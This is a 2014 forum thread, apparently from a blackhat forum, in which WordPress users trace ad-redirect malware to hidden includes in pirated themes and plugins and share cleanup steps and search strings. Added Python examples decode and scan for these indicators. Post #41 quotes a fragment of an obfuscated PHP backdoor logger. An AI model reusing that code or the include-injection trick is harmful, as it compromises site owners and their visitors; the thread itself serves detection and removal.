03-20-2014, 05:20 PM
Post: #41
RE: Have the same problem
I have the same problem with my website. Was not able to find any solution, but I found something weird.
A file called post.php with this in it:
Code:
0) print "\x53T\x41TUS\x2d\x49\x4dP\x4f\x52T-\x4fK";
if (strlen($input) > 10) {
    $fp = @fopen(str_replace("\x2ep\x68\x70",".\x62\x69\x6e",basename($_SERVER["SC\x52\x49P\x54_FIL\x45\x4eAM\x45"])), "a");
    @flock($fp, LOCK_EX);
    @fputs($fp, $_SERVER["\x52\x45\x4dOTE\x5f\x41DDR"]."\t".base64_encode($input)."\r\n");
    @flock($fp, LOCK_UN);
    @fclose($fp);
}
} elseif (strpos($_SERVER["\x52\x45Q\x55\x45\x53T\x5f\x55R\x49"], "\x2es\x68\x74\x6dl") !== false) {
    print $_SERVER["\x52\x45Q\x55\x45\x53T\x5f\x55R\x49"];
}
exit; ?>
Could it be related? I deleted the file multiple times and it keeps re-appearing.
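Added example, not part of the original post: a small Python decoder for the hex-escaped PHP string literals in the post.php fragment above, so the file can be read without executing it. The names `SAMPLE`, `decode_php_string` and `deobfuscate` are hypothetical; decoded, the literals show the fragment printing a status marker and appending the client address plus base64-encoded input to a .bin file named after the script.

```python
import re

# Constructed excerpt: statements copied from the post.php fragment quoted above.
SAMPLE = r'''print "\x53T\x41TUS\x2d\x49\x4dP\x4f\x52T-\x4fK";
$fp = @fopen(str_replace("\x2ep\x68\x70",".\x62\x69\x6e",basename($_SERVER["SC\x52\x49P\x54_FIL\x45\x4eAM\x45"])), "a");
@fputs($fp, $_SERVER["\x52\x45\x4dOTE\x5f\x41DDR"]."\t".base64_encode($input)."\r\n");
strpos($_SERVER["\x52\x45Q\x55\x45\x53T\x5f\x55R\x49"], "\x2es\x68\x74\x6dl")'''

# A PHP double-quoted literal, and the escapes PHP resolves inside one.
DQ_STRING = re.compile(r'"((?:[^"\\]|\\.)*)"')
ESCAPE = re.compile(r'\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3}|[nrtvef\\$"])')
SIMPLE = {"n": "\n", "r": "\r", "t": "\t", "v": "\v", "e": "\x1b", "f": "\f",
          "\\": "\\", "$": "$", '"': '"'}

def decode_php_string(body):
    """Resolve hex, octal and simple escapes in a double-quoted literal body."""
    def repl(m):
        tok = m.group(1)
        if tok[0] == "x":
            return chr(int(tok[1:], 16))
        if tok[0] in "01234567":
            return chr(int(tok, 8) & 0xFF)
        return SIMPLE[tok]
    return ESCAPE.sub(repl, body)

def deobfuscate(php_source):
    """Return (original, decoded) pairs for literals that contain hex escapes."""
    return [(m.group(1), decode_php_string(m.group(1)))
            for m in DQ_STRING.finditer(php_source) if "\\x" in m.group(1)]

if __name__ == "__main__":
    for original, decoded in deobfuscate(SAMPLE):
        print(f"{original!r:50} -> {decoded!r}")
```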
03-20-2014, 06:08 PM
(This post was last modified: 03-20-2014 06:14 PM by bale.)
Post: #42
RE:
(03-20-2014 02:23 PM)sreekuttan.dev@gmail.com Wrote: I am also facing this issue with theme themeforest_flatsome_1.8.7 downloaded from
Open functions.php and remove this line:
include 'inc/settings_class.php';
Also remove the file at that location. The jerk doing this uses an include function to the infected file. It's pretty easy to spot since it's at the very top of functions.php, or in the case of the mymail plugin,
include 'classes/wc.class.php';
right at the top of mymail.php
03-20-2014, 06:12 PM
(This post was last modified: 03-20-2014 06:15 PM by adwatch.)
Post: #43
RE:
(03-20-2014 03:19 PM)r1ckd33zy Wrote:
(03-20-2014 11:56 AM)adwatch Wrote: Hello to everyone at bestblackhatforum, my name is James and I am head of technical support over at adwat.ch
This is a most amazing act of 'customer support' I have seen in a while. Who would have thought that someone for adwat.ch would be involved in supporting members of a 'blackhat' forum...

Haha. We are a fairly new company and want to keep our name clean. We figure if we work with publishers, whether it be blackhat or whitehat, we can work together. Plus we have some really good fraud checks which none of our competitors have.

(03-20-2014 03:43 PM)imxa Wrote:
(03-20-2014 03:19 PM)r1ckd33zy Wrote:
(03-20-2014 11:56 AM)adwatch Wrote: Hello to everyone at bestblackhatforum, my name is James and I am head of technical support over at adwat.ch
This is a most amazing act of 'customer support' I have seen in a while. Who would have thought that someone for adwat.ch would be involved in supporting members of a 'blackhat' forum...

You don't need to PM your website if you're worried. You're welcome to contact us here: http://adwat.ch/contact.php
03-20-2014, 07:17 PM
Post: #44
RE:
(03-20-2014 06:08 PM)bale Wrote:
(03-20-2014 02:23 PM)sreekuttan.dev@gmail.com Wrote: I am also facing this issue with theme themeforest_flatsome_1.8.7 downloaded from

Where is this file "functions.php" located, as I can't find it in my blog location?
03-20-2014, 08:32 PM
Post: #45
RE:
Follow these steps
Log in to your wp-admin, then go to your site and click view source.
Now press Ctrl+F and search for body {visibility:hidden;} This code confirms adwatch is inserted in your theme or plugins. This code is implemented before the </head> tag. If you access the site in the same browser where you are logged in as admin, you will find this source code on your home page: <style> body {visibility:hidden;}</style>
Now go to the exploit-scanner plugin, check the "Search for suspicious styles" option, and click start scan. After some time it will reload.
Now press Ctrl+F again, search for body {visibility:hidden;} and check which file is affected, then uninstall that theme or plugin or delete that code in that file.
03-20-2014, 10:38 PM
Post: #46
RE:
Yes this happened to me a few years ago. I downloaded a theme and installed it, then I began getting the message this site has been hacked. I removed the theme, deleted the sub-domain it was under. Then I checked each .js file and looked for the word "var" and sure enough I found a re-direct link.
Not every var text is bad, just look for things like:
var adwatch
var iframe
var exclude
var adwatch _advert
and so on... Good hunting.
03-21-2014, 12:14 AM
Post: #47
RE:
Hi, I already tried to search for adwat in all source files of WordPress and nothing was found. The strange thing is that this is still happening after I bought the theme and replaced all files; the problem still happens. I'm suspecting that the malware must be in the database or in some place other than the theme files.
But I can't find it anywhere.
03-21-2014, 07:19 AM
Post: #48
RE:
(03-20-2014 06:08 PM)bale Wrote:
(03-20-2014 02:23 PM)sreekuttan.dev@gmail.com Wrote: I am also facing this issue with theme themeforest_flatsome_1.8.7 downloaded from

Go for this solution, it worked....
03-21-2014, 08:15 AM
Post: #49
RE:
Thanks to adwatch, the ads are gone until now, but I can't find the script yet. The recommendations

"bale Wrote:
(Today 04:23 AM)sreekuttan.dev@gmail.com Wrote: I am also facing this issue with theme themeforest_flatsome_1.8.7 downloaded from
Code: http://www4.zippyshare.com/v/25614833/file.html
and causing redirect at random time intervals from all my links on website.
Open functions.php and remove this line:
include 'inc/settings_class.php';
Also remove the file at that location. The jerk doing this uses an include function to the infected file. It's pretty easy to spot since it's at the very top of functions.php, or in the case of the mymail plugin,
include 'classes/wc.class.php';
right at the top of mymail.php
Go for this solution, it worked....
Read more @ bestblackhatforum.com : Beware before downloading wordpress themes and plugins [adwatch] http://bestblackhatforum.com/Thread-Bewa...z2wXm8El5K bestblackhatforum.com "

didn't work for me because I don't have that string in my functions file, but thanks anyway.
03-21-2014, 10:52 AM
Post: #50
RE:
I'd like to thank everyone for sharing their contributions to this thread b/c I also ran across this problem w/ a plugin that I installed (EventON).
After spending countless hours going over every line of code with a colleague, it finally dawned on me to look @ the code that "bale" suggested was the problem. My file was hidden away in "classes/class-settings.php" and called by
include 'classes/class-settings.php';
in my eventon.php file.
The key is to do a search (I used the Multi-File Search in TextWrangler of my entire site --- downloaded locally to my machine) for the following string:
spamcheckr
The "infected" file (class-settings.php) has a ton of commented out lines of code, but it really only does one thing which is to pull the URL "http://spamcheckr.com/l.php". Just bringing that URL up in your browser will show a blank page. But if you view the source, you will see the following code:
Code: <script type="text/javascript">
As "bale" suggested, just delete the include from your file and delete that class-settings.php and you should be good to go.
Hope this helps.
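Added example, not part of any post in this thread: a Python sketch of the multi-file search described in posts #42, #45 and #50, run over a local copy of a site. It reports files containing the strings quoted in the thread and PHP files that include a local .php file within their first few statements; the function names, the five-statement window and the sample tree are assumptions made for illustration, and an early include is only a lead for manual review because legitimate themes do it too.

```python
import os
import re
import tempfile

# Strings quoted in the thread (posts #45 and #50).
INDICATORS = ("spamcheckr", "body {visibility:hidden;}")
# include/require of a quoted relative .php path, as in posts #42 and #50.
INCLUDE_RE = re.compile(r"""(?:include|require)(?:_once)?\s*\(?\s*['"]([^'"]+\.php)['"]""")

def leading_includes(text, max_statements=5):
    """Return include targets among the first few code lines of a PHP file."""
    code = re.sub(r"<\?php|/\*.*?\*/", "", text, flags=re.S)  # drop tag, block comments
    lines = [ln.strip() for ln in code.splitlines()]
    stmts = [ln for ln in lines if ln and not ln.startswith(("//", "#"))]
    return [m.group(1) for ln in stmts[:max_statements] if (m := INCLUDE_RE.match(ln))]

def scan(root):
    """Walk root and return sorted (relative_path, reason) findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith((".php", ".js", ".html")):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            findings += [(rel, "contains " + s) for s in INDICATORS if s in text]
            if name.endswith(".php"):
                findings += [(rel, "early include of " + t) for t in leading_includes(text)]
    return sorted(findings)

def build_sample(root):
    """Write a small constructed site tree (not real theme code) under root."""
    files = {
        "theme/functions.php": "<?php\ninclude 'inc/settings_class.php';\nfunction setup() {}\n",
        "theme/inc/settings_class.php": "<?php\n$u = 'spamcheckr'; // constructed stand-in\n",
        "theme/header.php": "<head><style> body {visibility:hidden;}</style></head>\n",
        "plugin/clean.php": "<?php\n/*\nPlugin Name: Clean\n*/\nfunction ok() {}\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for rel, reason in scan(tmp):
            print(rel, "->", reason)
```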